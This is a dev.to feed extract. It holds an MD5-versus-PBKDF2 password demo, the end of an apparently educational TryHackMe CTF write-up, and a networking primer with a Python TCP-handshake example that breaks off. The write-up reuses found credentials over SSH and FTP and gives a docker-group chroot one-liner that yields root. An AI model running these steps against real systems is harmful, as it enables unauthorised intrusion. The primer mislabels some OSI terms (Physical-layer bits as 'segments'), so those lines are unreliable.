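# Constructed mini wordlist standing in for a lookup service's database.
WORDLIST = ["password", "123456", "letmein", "qwerty", "summer2023"]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_md5_table(words):
    """Precompute digest to plaintext once. Without a salt every user who
    picked the same password has the same digest, so one table serves all."""
    return {md5_hex(word): word for word in words}


def lookup_md5(hex_digest, table):
    """Reverse lookup: plaintext if the digest was precomputed, else None."""
    return table.get(hex_digest.strip().lower())


def hash_password(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256. A fresh 16-byte random salt per user means
    equal passwords produce different digests, so no table can be built in
    advance, and the iteration count makes each guess expensive."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join([salt.hex(), str(iterations), digest.hex()])


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, iterations, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def demo():
    """Unsalted MD5 falls to the table; the salted digest is not in it."""
    table = build_md5_table(WORDLIST)
    leaked_md5 = md5_hex("letmein")  # what an unsalted dump exposes
    stored = hash_password("letmein")
    return {
        "md5_recovered": lookup_md5(leaked_md5, table),
        "pbkdf2_recovered": lookup_md5(stored.split("$")[2], table),
        "pbkdf2_verifies": verify_password("letmein", stored),
    }


if __name__ == "__main__":
    print(demo())
```

&lt;p&gt;The stored format keeps the salt and iteration count next to the digest, so the cost can be raised later without invalidating existing records: verify with the old parameters, then rehash on the next successful login.&lt;/p&gt;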

&lt;h2&gt;
  
  
  Phase 4 - Vulnerability Analysis
&lt;/h2&gt;

&lt;p&gt;In this phase the pentester analyzes the systems and applications and their corresponding vulnerabilities. They review every attack vector found so far and consider the best way to exploit each one. In our case, we know that our target runs an FTP service on port 21 and SSH on port 22. It also runs some websites and, most importantly, even a login page. You can abuse your Google-Fu skills, take any information available and use &lt;a href="https://www.exploit-db.com/" rel="noopener noreferrer"&gt;https://www.exploit-db.com/&lt;/a&gt; or &lt;code&gt;searchsploit&lt;/code&gt; on the command line. My personal taste is to try low-hanging fruit first, or simply the obvious stuff. It's pretty common to overengineer your attack and try some extreme techniques, but sometimes you just need to keep it simple to show that your target system isn't that secure.&lt;/p&gt;

&lt;p&gt;That being said, we stand here with a lot of useful information about our target system already, including some credentials and three possible places where we can use them to move on to the Exploitation Phase: FTP, SSH and the login page. With that in mind, let's do as I said and try those.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 5 - Exploitation Phase
&lt;/h2&gt;

&lt;p&gt;The Exploitation phase is the moment where you gather all the information acquired in the previous phases and apply it with the sole objective of bypassing the target system's defenses and establishing access to it. As I mentioned before, if the Vulnerability Analysis phase was carefully planned, this phase should be a precise attack. With our plan to use the credentials in mind, let's go and execute it.&lt;/p&gt;

&lt;p&gt;By going to the :31331/partners.html, which is a login page, we use the credentials we found during the Enumeration phase, but it leads to a dead end. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fib4jdv0fh88lbu1kepcq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fib4jdv0fh88lbu1kepcq.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That's okay. We keep this as a note, and move on to our second vector, the SSH on port 22. By using the credentials there, we can get into the system! &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7hzrqprmyx5x6c16b6ul.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7hzrqprmyx5x6c16b6ul.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Those credentials can also be used to log into the FTP service, as shown in the screenshot below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi3k5e8uc2d9vq2mfh8t3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi3k5e8uc2d9vq2mfh8t3.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Okay, now that we have access on multiple fronts, we can say that we performed a successful Exploitation phase.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 6 - Post-Exploitation Phase
&lt;/h2&gt;

&lt;p&gt;This phase is the proof that a well-executed penetration test doesn't finish once the pentester has obtained access to the machine. Now it's time to move on and try to (if previously agreed on in the pre-engagement phase, of course) 1) observe which sensitive files could be accessed by a possible attacker, 2) escalate privileges, 3) cause denial of service, and 4) maintain and persist access for later exploitation.&lt;/p&gt;

&lt;p&gt;We can start looking around for critical files, but the way a CTF-based box such as the ones on TryHackMe and HackTheBox emulates these files is with flags. Keep in mind that flags alone are not what you will see in a real-world scenario. That being said, let's try to look for the root user's SSH private key, as specified by the &lt;a href="https://tryhackme.com/room/ultratech1" rel="noopener noreferrer"&gt;original box exercise&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;To check which programs the current user is allowed to run with sudo on Linux, I like to run &lt;code&gt;sudo -l&lt;/code&gt;. This can be a good way to enumerate attack vectors for escalating your privileges to the root user. However, in this specific case, it didn't work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5nov6lub2bosglri8f8u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5nov6lub2bosglri8f8u.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As we can see in the screenshot above, the r00t user (just a regular user, not the actual root user) is a member of the docker group, which can be a way to escalate privileges. We can check this and confirm our theory by running LinEnum, which can be found at &lt;a href="https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh&lt;/a&gt;. Once we open it, we just need to copy the raw code, move back to r00t's home directory, create a &lt;strong&gt;linenum.sh&lt;/strong&gt; file (using &lt;strong&gt;nano&lt;/strong&gt; or &lt;strong&gt;vim&lt;/strong&gt;, for example), paste the code there, save the file and make it executable by running &lt;code&gt;chmod +x linenum.sh&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2esraqqmwz7h4ornimzg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2esraqqmwz7h4ornimzg.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can now run &lt;code&gt;./linenum.sh &amp;gt; lin&lt;/code&gt; to execute the script and save its output to a newly created &lt;strong&gt;lin&lt;/strong&gt; file. It might take a while, but once it's done we just need to open that file to get the following output:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr2wqx67mknozgq4nnv17.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr2wqx67mknozgq4nnv17.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As the script reports, it looks like Docker is installed on this host, and we could possibly misuse the docker group's permissions.&lt;/p&gt;

&lt;p&gt;An awesome resource for privilege escalation is GTFOBins, which has a specific section just for docker exploitation, as we can find here - &lt;a href="https://gtfobins.github.io/gtfobins/docker/#sudo" rel="noopener noreferrer"&gt;https://gtfobins.github.io/gtfobins/docker/#sudo&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This one specifically explains how we can escalate privileges by misusing Docker permissions, and we just need to run a simple command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;However, this command will try to pull a vanilla Docker image - alpine - and in our case it won't work properly. With a simple tweak, however, we can change this. We just need to switch from alpine to &lt;strong&gt;bash&lt;/strong&gt; and remove the sudo command, since we're not currently running with sudo:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;docker run -v /:/mnt --rm -it bash chroot /mnt sh&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;After a short wait, the exploit completes and we have successfully escalated our privileges.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffin437tlgz107em55mlp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffin437tlgz107em55mlp.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now that we are running with the highest privileges, we can start looking for useful information, which is the main objective of the post-exploitation phase.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faryjnxt8sx0ybbme77l6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faryjnxt8sx0ybbme77l6.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here we find some critical, sensitive information, such as this &lt;strong&gt;private.txt&lt;/strong&gt; file and the &lt;strong&gt;SSH keys&lt;/strong&gt;. This is an awesome finding, and for the context and scope of this box, it also concludes our post-exploitation phase.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 7 - Reporting Phase
&lt;/h2&gt;

&lt;p&gt;This is the point where you consolidate all processes, findings, attack vectors and analysis from your whole penetration test into clear, objective language that the stakeholders can easily understand and use to guide their decision-making in the company. This is arguably the second most important phase in the whole process, sometimes even more important than the Information Gathering Phase, because if the report isn't clear, the whole assessment won't be useful to the company at all.&lt;/p&gt;

&lt;p&gt;There are a lot of models and layouts for creating your own reports, but the most important aspect is that the report be understood. Details also matter here, and a good guideline can be found at &lt;a href="http://www.pentest-standard.org/index.php/Reporting" rel="noopener noreferrer"&gt;http://www.pentest-standard.org/index.php/Reporting&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;This concludes this post, which was written with the intention of kickstarting people into Pentesting and Cybersecurity. However, this isn't a final read, just a suggestion on how you can start developing your own methodology. I recommend you start researching other people's methodologies, as well as practicing a lot of techniques on CTFs and even bug bounties. This will get the gears spinning and make things easier to understand in the long run.&lt;/p&gt;

&lt;p&gt;I wrote another post on how people can get started in Cybersecurity that can be useful for getting a bit of direction, so if you need to start somewhere, you can go there. And keep in mind that Cybersecurity is an ever-evolving field, so never stop learning. Try new stuff every day, read a lot, get new perspectives on subjects you &lt;em&gt;thought&lt;/em&gt; you had mastered, and stay humble! You'll never know everything, so be respectful to people who are just starting. Help them and try to learn something from them as well, because I do believe everyone has something to teach someone else, no matter their level of experience.&lt;/p&gt;

&lt;p&gt;Keep on practicing, and connect with me on &lt;a href="https://twitter.com/thearturserra" rel="noopener noreferrer"&gt;Twitter&lt;/a&gt; to ask any questions and give some feedback (or just chat!) &lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>hacking</category>
      <category>beginners</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>An Introduction to Networks - A TryHackMe Introductory Networking WriteUp</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Tue, 23 Feb 2021 19:29:33 +0000</pubDate>
      <link>https://dev.to/arturserra/an-introdution-to-networks-2gll</link>
      <guid>https://dev.to/arturserra/an-introdution-to-networks-2gll</guid>
      <description>&lt;h1&gt;
  
  
  Intro
&lt;/h1&gt;

&lt;p&gt;Understanding how packets travel from one endpoint to another in the network, as well as how to properly secure or intercept those packets, is invaluable knowledge when it comes to Cybersecurity. Networking can be subdivided into multiple subjects, and in this article we'll look deeper into this concept in order to learn how important it is to understand Networking.&lt;/p&gt;

&lt;h1&gt;
  
  
  Acknowledgements
&lt;/h1&gt;

&lt;p&gt;I'm writing this article as part of my process to take the eJPT and to consolidate the knowledge I got from INE's official Learning Path, &lt;strong&gt;Penetration Testing Student, by Lukasz Mikula&lt;/strong&gt;. I truly believe that learning is more of an active process than a passive one, so I do think I understand things better once I'm teaching other people about the subject and practicing around it. I'll try to take this approach in this article as well. We'll start with a bit of theory, which is really necessary when it comes to Networking, but we'll go practical as well with &lt;strong&gt;TryHackMe's&lt;/strong&gt; rooms. I'll write up all the &lt;a href="https://tryhackme.com/room/introtonetworking" rel="noopener noreferrer"&gt;necessary rooms&lt;/a&gt;, so you can learn a bit more about my methodologies and try them yourself. No worries if you just follow along step by step in the beginning, as long as you understand all the procedures and start to build your own processes and methodologies.&lt;/p&gt;

&lt;p&gt;The main objective of this article, at the end of the day, is to provide an easy-to-understand starting guide to all those who want to kickstart their lives in Cybersecurity. It can also work as study companion material for those who are studying for the eJPT, or as a study companion for newcomers to the CTF community who just joined TryHackMe and want write-ups for a bunch of popular rooms. Or it can just be a study guide that introduces some core concepts of Cybersecurity to curious people!&lt;/p&gt;




&lt;h1&gt;
  
  
  Networking Fundamentals
&lt;/h1&gt;

&lt;h2&gt;
  
  
  OSI Model - An Overview
&lt;/h2&gt;

&lt;p&gt;First of all, we need to understand what Computer Networking means. In a very abstract manner, we can consider Computer Networking as "the practice of interfacing two or more computing devices with each other for the purpose of sharing data." (Bradley Mitchell). This interaction can occur in different "flavors", like LANs or WANs, and also different designs, such as client-server and peer-to-peer. &lt;/p&gt;

&lt;p&gt;Computer Networking also has a standard basic model that can be used to better visualize and understand the theory behind it. This model is called the OSI Model:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feiq51lb9mtuynx48gje0.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feiq51lb9mtuynx48gje0.jpeg" alt="OSI Model"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Data Journey across the Network
&lt;/h2&gt;

&lt;h3&gt;
  
  
  7 - Application Layer
&lt;/h3&gt;

&lt;p&gt;This is the top layer, the one most end users see. It's the layer that receives input from and displays data to the end user. However, the application itself does not reside in the Application Layer. This layer is just a platform that connects the information to the end user by accepting communication requests entered into the application, then passing them down to the lower layers. Web browsers and FTP are good examples of Application Layer communications.&lt;/p&gt;

&lt;h3&gt;
  
  
  6 - Presentation Layer
&lt;/h3&gt;

&lt;p&gt;The Presentation Layer is usually called the "Translation Layer", because it prepares data for the transition from application formatting to network formatting, or vice versa. The Presentation Layer is not as visible as the Application Layer (if at all!), but it's responsible for "displaying" and translating data for the Application or the Network. Good examples of Presentation Layer tasks are the encryption, decryption, compression and transformation of data for secure transmission.&lt;/p&gt;

&lt;h3&gt;
  
  
  5 - Session Layer
&lt;/h3&gt;

&lt;p&gt;If the Presentation Layer is the "translation layer", we can call the Session Layer the "connection layer". In order to maintain a "dialogue" between two computers, a session must be established. This layer is responsible not only for creating this bridge, but also for maintaining, managing, tracking and finishing the conversation when required.&lt;/p&gt;

&lt;h3&gt;
  
  
  4 - Transport Layer
&lt;/h3&gt;

&lt;p&gt;The Transport Layer is the "Post-Office Layer" of the OSI Model. It coordinates everything related to data transfer: how much data will be sent, its transmission rate, where it is going, etc. Although they're not part of the OSI model itself, &lt;strong&gt;the Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP) are categorized as Layer 4 protocols&lt;/strong&gt;. TCP is a connection-based protocol, meaning that the connection between the two computers is maintained for the whole duration of the request. It's also a &lt;strong&gt;patient connection&lt;/strong&gt;, because it lets the two computers keep a reliable connection in which all packets are guaranteed to be delivered to the right place. For the whole duration, the bridge between the two computers stays stable while data is sent at an acceptable speed, and lost packets are recovered and re-sent. UDP is a &lt;strong&gt;hasty connection&lt;/strong&gt;, meaning: if the computers can't keep up with its pace, that's their problem. The usage rules are simple: if you need data accuracy over speed, choose TCP. If speed matters more than every single packet being delivered (like in a video chat application), then speed must be prioritized over accuracy, and UDP seems to be the perfect selection.&lt;/p&gt;

&lt;h3&gt;
  
  
  3 - Network Layer
&lt;/h3&gt;

&lt;p&gt;The Network Layer is responsible for locating the destination of your requests, as well as forwarding packets to that destination. This is the home of IP addresses and logical addressing, and it's also the layer where the connection finds the best route to take in order to reach the destination. If a packet is too large to be transmitted, this layer can also split it into several fragments, which are sent out and then reassembled on the other end.&lt;/p&gt;

&lt;h3&gt;
  
  
  2 - Data Link Layer
&lt;/h3&gt;

&lt;p&gt;The Data Link Layer is where node-to-node data transfer happens. It's also home to the MAC (Media Access Control) address, and it's considered a physical layer. Layer 2 is divided into two sub-layers: MAC, or Media Access Control, and LLC, or Logical Link Control. The MAC sub-layer determines how devices on a network gain access to a medium and get permission to transmit data over the network. LLC identifies and encapsulates network layer protocols and controls error checking and frame synchronization. The MAC address also provides the physical address of the machine, and this layer is responsible for &lt;strong&gt;checking if received packets are corrupted&lt;/strong&gt; and for formatting and preparing data that is about to be sent.&lt;/p&gt;

&lt;h3&gt;
  
  
  1 - Physical Layer
&lt;/h3&gt;

&lt;p&gt;The Physical Layer represents the tangible end of the system. The &lt;strong&gt;electrical parts&lt;/strong&gt; are included here, as well as pin layouts, voltages, radio frequency links and other &lt;strong&gt;physical requirements.&lt;/strong&gt; It's a media layer used to &lt;strong&gt;transmit and receive raw bits of data&lt;/strong&gt; (called segments), which it converts into all sorts of signals.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhhchopaizxmpmwnpw6vq.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhhchopaizxmpmwnpw6vq.jpeg" alt="OSI Model over the wire"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Which layer would you choose to send data over TCP or UDP?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The UDP and TCP protocols are handled by &lt;strong&gt;Layer 4.&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer checks received packets to make sure that they haven't been corrupted?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;One of the responsibilities of &lt;strong&gt;Layer 2&lt;/strong&gt; is to provide a physical address for the machine, format and prepare data, and confirm that received packets aren't corrupted.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;In which layer would data be formatted in preparation for transmission?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;As already mentioned in the question above, one of the responsibilities of &lt;strong&gt;Layer 2&lt;/strong&gt; is to provide a physical address for the machine, format and prepare data, and confirm that received packets aren't corrupted.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer transmits and receives data?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;One of the responsibilities of &lt;strong&gt;Layer 1&lt;/strong&gt; is to transmit and receive data segments and convert them into signals.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer encrypts, compresses, or otherwise transforms the initial data to give it a standardized format?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The process of encryption, decryption, compression and transformation of data for secure transmission is a responsibility of &lt;strong&gt;Layer 6&lt;/strong&gt;.
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer tracks communications between the host and receiving computers?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Layer 5&lt;/strong&gt; is responsible not only for creating this bridge, but also for maintaining, managing, tracking and finishing the conversation when required.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer accepts communication requests from applications?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Layer 7&lt;/strong&gt; connects the information to the end user by accepting communication requests entered into the application, then passing them down to the lower layers.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer handles logical addressing?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Layer 3&lt;/strong&gt; is the home of IP addresses and logical addressing.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;When sending data over TCP, what would you call the "bite-sized" pieces of data?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Bite-sized pieces of data are called &lt;strong&gt;Segments&lt;/strong&gt;.
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which layer would the FTP protocol communicate with?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Web Browsers and FTP are good examples of &lt;strong&gt;Layer 7&lt;/strong&gt; Communications.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Which transport layer protocol would be best suited to transmit a live video?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If speed matters more than every single packet being delivered (like in a video chat application), then speed must be prioritized over accuracy, and &lt;strong&gt;UDP&lt;/strong&gt; seems to be the perfect selection.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  &lt;strong&gt;Encapsulation&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Whenever data is passed down the layers of the OSI Model, it gets encapsulated. This means that each layer adds its own information to the data as a header, with information that the next layer needs to evaluate. The Data Link Layer also adds a trailer at the end of the data, which is used to confirm whether the data was corrupted during its journey. Along the way, the name of the data unit varies: it's called a &lt;strong&gt;Segment&lt;/strong&gt; or &lt;strong&gt;Datagram&lt;/strong&gt; in the Transport Layer, and a &lt;strong&gt;Frame&lt;/strong&gt; in the Data Link Layer. Once the data reaches its destination, the de-capsulation process begins, and the same steps are taken in reverse order. You might ask why this whole process exists, and the answer is simple: the headers added during encapsulation not only carry the critical information needed for the data to be sent correctly to its destination, but also add an extra layer of &lt;strong&gt;security&lt;/strong&gt; and &lt;strong&gt;reliability&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fskah3wm4btxysk7nurjc.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fskah3wm4btxysk7nurjc.jpeg" alt="Data Encapsulation Process"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TCP/IP Model
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5mpeor9sk7va4byzxbui.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5mpeor9sk7va4byzxbui.jpeg" alt="TCP/IP Model"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As MuirlandOracle mentions in his TryHackMe room, "it's important to understand exactly why the TCP/IP and OSI models were originally created. To begin with there was no standardisation -- different manufacturers followed their own methodologies, and consequently systems made by different manufacturers were completely incompatible when it came to networking. The TCP/IP model was introduced by the American DoD in 1982 to provide a standard -- something for all of the different manufacturers to follow. This sorted out the inconsistency problems. Later the OSI model was also introduced by the International Organisation for Standardisation (ISO); however, it's mainly used as a more comprehensive guide for learning, as the TCP/IP model is still the standard upon which modern networking is based."&lt;/p&gt;

&lt;p&gt;It's also important to understand that TCP/IP is a &lt;strong&gt;Connection-Oriented Protocol&lt;/strong&gt; (or Connection-Based Protocol). According to the Oracle documentation, "it requires a logical connection to be established between the two processes before data is exchanged. The connection must be maintained during the entire time that communication is taking place, then released afterwards. The process is much like a telephone call, where a virtual circuit is established--the caller must know the person's telephone number and the phone must be answered--before the message can be delivered."&lt;/p&gt;

&lt;p&gt;Communication in the TCP/IP Model is established with a SYN/ACK exchange, or a &lt;strong&gt;three-way handshake.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You might be asking: &lt;em&gt;Okay, but how does this work?&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;It's quite simple! In a &lt;strong&gt;three-way handshake,&lt;/strong&gt; the first computer sends a request to a second computer, indicating that it wants to start a connection, to &lt;strong&gt;SYN&lt;/strong&gt;chronize with it. The second computer then responds with a single packet that carries its own &lt;strong&gt;SYN&lt;/strong&gt;chronize information and &lt;strong&gt;ACK&lt;/strong&gt;nowledges the request to start a connection. Finally, the first computer sends a final packet containing only the &lt;strong&gt;ACK&lt;/strong&gt;nowledgment that the conversation between the two computers can start.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsidcnt1wu2qltt4164iw.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsidcnt1wu2qltt4164iw.jpeg" alt="SYN/ACK"&gt;&lt;/a&gt;&lt;/p&gt;
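&lt;p&gt;The SYN / SYN-ACK / ACK exchange described above, traced with its sequence numbers, as an added example that is not part of the original post: each side is modelled as a small state machine, and a segment that doesn't fit the current state is rejected instead of acted on. The Endpoint class, the state names and the random initial sequence numbers are constructed for illustration.&lt;/p&gt;

```python
"""TCP three-way handshake, step by step.

Added example, not part of the original post. It models only the
SYN / SYN-ACK / ACK exchange and the sequence-number bookkeeping that
ties the three segments together; the Endpoint class, state names and
the random initial sequence numbers are constructed for illustration.
"""
from dataclasses import dataclass
import secrets

SEQ_MOD = 2 ** 32          # TCP sequence numbers wrap at 32 bits


@dataclass
class Segment:
    src: str
    dst: str
    flags: frozenset       # subset of {"SYN", "ACK"}
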